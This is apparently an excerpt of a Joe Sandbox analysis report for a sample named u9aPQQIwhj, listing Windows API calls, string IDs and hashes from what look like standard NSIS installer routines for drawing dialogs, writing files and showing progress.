                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                  • API String ID: 1265525490-3322868524
                                                  • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                  • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                  • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                  • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                  • lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
                                                  • lstrcatW.KERNEL32(?,00427180), ref: 0040473B
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                    • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061DF
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                    • Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061F3
                                                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 00406206
                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A
                                                  • API String ID: 2246997448-3554254475
                                                  • Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                  • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                  • Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
                                                  • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DCE
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
                                                  • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A
                                                  Strings
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                                  • soft, xrefs: 00402EAA
                                                  • Null, xrefs: 00402EB3
                                                  • Inst, xrefs: 00402EA1
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                                  • Error launching installer, xrefs: 00402E0A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
                                                  • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
                                                  • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                  • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
                                                  • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                  • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                  • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-730719616
                                                  • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                  • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                  • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                  • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                  • GetSysColor.USER32(00000000), ref: 004041CD
                                                  • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                  • SetBkMode.GDI32(?,?), ref: 004041E5
                                                  • GetSysColor.USER32(?), ref: 004041F8
                                                  • SetBkColor.GDI32(?,?), ref: 00404208
                                                  • DeleteObject.GDI32(?), ref: 00404222
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D
                                                    • Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                  • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                  • Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                  • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                  • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                  APIs
                                                  • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                  • SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                  • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                  • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                  • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00402D33
                                                  • GetTickCount.KERNEL32 ref: 00402D51
                                                  • wsprintfW.USER32 ref: 00402D7F
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                    • Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                  • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                  • Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                  • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                  • GetMessagePos.USER32 ref: 00404A7F
                                                  • ScreenToClient.USER32(?,?), ref: 00404A99
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
                                                  • wsprintfW.USER32 ref: 00402CCF
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-3823777903
                                                  • Opcode ID: 7ccc28fcdcb55aed1c6be28d824080e0d361158b26e59fb3c9f44876b661714c
                                                  • Instruction ID: 4e2b04be86e469719605c8e6d83f5c1d182d7f5bc4e74aeb210e83b52eb187fa
                                                  • Opcode Fuzzy Hash: 7ccc28fcdcb55aed1c6be28d824080e0d361158b26e59fb3c9f44876b661714c
                                                  • Instruction Fuzzy Hash: 29916D34A00209DFFB18DB64C996B6E77F7BF44340F108979E402AB295DB34A845CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                  • API String ID: 0-390881366
                                                  • Opcode ID: 1a6432445960876793f6af33efe9447173c1400e45c581a4935271ad9800190a
                                                  • Instruction ID: 91198cd29ac192a550e5734a742640099b598356c5ed2d064b7be675b560ec6b
                                                  • Opcode Fuzzy Hash: 1a6432445960876793f6af33efe9447173c1400e45c581a4935271ad9800190a
                                                  • Instruction Fuzzy Hash: A8F11F34A00209CFDB19EBA8C594A5EB7F3BF84341F608969D415AB365DB35EC86CF81
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403190
                                                    • Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                  • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                  • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: x>A
                                                  • API String ID: 2146148272-3854404225
                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,74DF3420,00403510), ref: 004061DF
